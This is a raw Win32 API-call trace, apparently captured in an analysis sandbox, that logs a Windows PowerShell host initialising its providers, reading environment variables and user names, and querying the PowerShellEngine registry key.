	[0510.571] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x454a30, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ad4f0, lpMaximumComponentLength=0x1ad4ec, lpFileSystemFlags=0x1ad4e8, lpFileSystemNameBuffer=0x4549c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ad4f0*=0x9c354b42, lpMaximumComponentLength=0x1ad4ec*=0xff, lpFileSystemFlags=0x1ad4e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0510.571] CoTaskMemFree (pv=0x454a30) 
	[0510.571] CoTaskMemFree (pv=0x4549c0) 
	[0510.571] SetErrorMode (uMode=0x1) returned 0x1
	[0510.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0510.573] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.573] SetErrorMode (uMode=0x1) returned 0x1
	[0510.573] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad490 | out: lpFileInformation=0x1ad490*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0510.573] SetErrorMode (uMode=0x1) returned 0x1
	[0510.573] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.573] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0510.574] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0510.575] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.575] SetErrorMode (uMode=0x1) returned 0x1
	[0510.575] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad2c0 | out: lpFileInformation=0x1ad2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0510.575] SetErrorMode (uMode=0x1) returned 0x1
	[0510.575] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.575] SetErrorMode (uMode=0x1) returned 0x1
	[0510.575] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad2c0 | out: lpFileInformation=0x1ad2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0510.575] SetErrorMode (uMode=0x1) returned 0x1
	[0510.575] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.575] SetErrorMode (uMode=0x1) returned 0x1
	[0510.576] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad360 | out: lpFileInformation=0x1ad360*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0510.576] SetErrorMode (uMode=0x1) returned 0x1
	[0510.576] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0510.576] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0510.576] CoTaskMemFree (pv=0x1b83fb60) 
	[0510.576] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0510.576] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0510.577] CoTaskMemFree (pv=0x3f1af0) 
	[0510.577] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edc448*="FileSystem", lpRawData=0x2edc1d8) returned 1
	[0510.578] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.578] CoTaskMemFree (pv=0x4341c0) 
	[0510.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.580] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0510.580] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0510.581] CoTaskMemFree (pv=0x1b83fb60) 
	[0510.581] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0510.581] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0510.581] CoTaskMemFree (pv=0x3f1af0) 
	[0510.581] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee1c88*="Function", lpRawData=0x2ee1a18) returned 1
	[0510.585] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.585] CoTaskMemFree (pv=0x4341c0) 
	[0510.601] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0510.601] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0511.189] CoTaskMemFree (pv=0x1b83fb60) 
	[0511.189] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0511.189] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0511.190] CoTaskMemFree (pv=0x3f1af0) 
	[0511.190] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f044b0*="Registry", lpRawData=0x2f04240) returned 1
	[0511.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.334] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0511.334] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0511.335] CoTaskMemFree (pv=0x1b83fb60) 
	[0511.335] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0511.335] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0511.335] CoTaskMemFree (pv=0x3f1af0) 
	[0511.336] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f098c8*="Variable", lpRawData=0x2f09658) returned 1
	[0511.338] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0511.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.338] CoTaskMemFree (pv=0x4341c0) 
	[0511.338] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0511.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.338] CoTaskMemFree (pv=0x4341c0) 
	[0512.028] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0512.028] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0512.028] CoTaskMemFree (pv=0x1b83fb60) 
	[0512.028] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0512.028] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0512.028] CoTaskMemFree (pv=0x3f1af0) 
	[0512.029] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1d4e0*="Certificate", lpRawData=0x2f1d270) returned 1
	[0512.647] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.647] CoTaskMemFree (pv=0x4341c0) 
	[0512.651] GetLogicalDrives () returned 0x4
	[0512.651] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0512.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0512.652] CoTaskMemAlloc (cb=0x20e) returned 0x43fab0
	[0512.652] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x43fab0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0512.652] CoTaskMemFree (pv=0x43fab0) 
	[0512.654] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.654] CoTaskMemFree (pv=0x4341c0) 
	[0512.654] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.654] CoTaskMemFree (pv=0x4341c0) 
	[0512.672] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.672] CoTaskMemFree (pv=0x4341c0) 
	[0512.673] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.673] CoTaskMemFree (pv=0x4341c0) 
	[0512.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0512.674] SetErrorMode (uMode=0x1) returned 0x1
	[0512.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad3b0 | out: lpFileInformation=0x1ad3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0512.674] SetErrorMode (uMode=0x1) returned 0x1
	[0512.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0512.674] SetErrorMode (uMode=0x1) returned 0x1
	[0512.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad3b0 | out: lpFileInformation=0x1ad3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0512.674] SetErrorMode (uMode=0x1) returned 0x1
	[0512.675] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0512.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.675] CoTaskMemFree (pv=0x4341c0) 
	[0512.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0512.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0512.679] SetErrorMode (uMode=0x1) returned 0x1
	[0512.679] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad670 | out: lpFileInformation=0x1ad670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0512.679] SetErrorMode (uMode=0x1) returned 0x1
	[0513.315] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0513.315] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad9d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad9d8) returned 0x1
	[0513.316] CoTaskMemFree (pv=0x1b83fb60) 
	[0513.316] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0513.316] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ada18 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ada18) returned 1
	[0513.316] CoTaskMemFree (pv=0x3f1af0) 
	[0513.317] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f561c8*="Available", lpRawData=0x2f55f58) returned 1
	[0514.554] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0514.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.555] CoTaskMemFree (pv=0x4341c0) 
	[0514.556] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0514.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.556] CoTaskMemFree (pv=0x4341c0) 
	[0514.559] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0514.559] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0514.559] CoTaskMemFree (pv=0x4341c0) 
	[0514.559] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0514.559] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0514.559] CoTaskMemFree (pv=0x4341c0) 
	[0514.562] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad9f8 | out: phkResult=0x1ad9f8*=0x388) returned 0x0
	[0514.562] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad97c, lpData=0x0, lpcbData=0x1ad978*=0x0 | out: lpType=0x1ad97c*=0x1, lpData=0x0, lpcbData=0x1ad978*=0x56) returned 0x0
	[0514.562] CoTaskMemAlloc (cb=0x5a) returned 0x1b8375e0
	[0514.562] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad94c, lpData=0x1b8375e0, lpcbData=0x1ad948*=0x56 | out: lpType=0x1ad94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad948*=0x56) returned 0x0
	[0514.562] CoTaskMemFree (pv=0x1b8375e0) 
	[0514.562] RegCloseKey (hKey=0x388) returned 0x0
	[0514.564] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0514.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.564] CoTaskMemFree (pv=0x4341c0) 
	[0515.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0515.964] VirtualQuery (in: lpAddress=0x1aba50, lpBuffer=0x1ac910, dwLength=0x30 | out: lpBuffer=0x1ac910*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0515.968] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.968] CoTaskMemFree (pv=0x4341c0) 
	[0515.976] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.976] CoTaskMemFree (pv=0x4341c0) 
	[0515.977] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.977] CoTaskMemFree (pv=0x4341c0) 
	[0515.977] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.977] CoTaskMemFree (pv=0x4341c0) 
	[0515.978] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.979] CoTaskMemFree (pv=0x4341c0) 
	[0515.982] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.982] CoTaskMemFree (pv=0x4341c0) 
	[0515.982] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0515.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.982] CoTaskMemFree (pv=0x4341c0) 
	[0519.611] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0519.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.612] CoTaskMemFree (pv=0x4341c0) 
	[0522.004] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x434600
	[0522.006] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x434710
	[0527.833] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.833] CoTaskMemFree (pv=0x434820) 
	[0527.835] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.835] CoTaskMemFree (pv=0x434820) 
	[0527.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adb58 | out: phkResult=0x1adb58*=0x394) returned 0x0
	[0527.846] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adadc, lpData=0x0, lpcbData=0x1adad8*=0x0 | out: lpType=0x1adadc*=0x1, lpData=0x0, lpcbData=0x1adad8*=0x56) returned 0x0
	[0527.846] CoTaskMemAlloc (cb=0x5a) returned 0x1b855260
	[0527.846] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adaac, lpData=0x1b855260, lpcbData=0x1adaa8*=0x56 | out: lpType=0x1adaac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1adaa8*=0x56) returned 0x0
	[0527.846] CoTaskMemFree (pv=0x1b855260) 
	[0527.846] RegCloseKey (hKey=0x394) returned 0x0
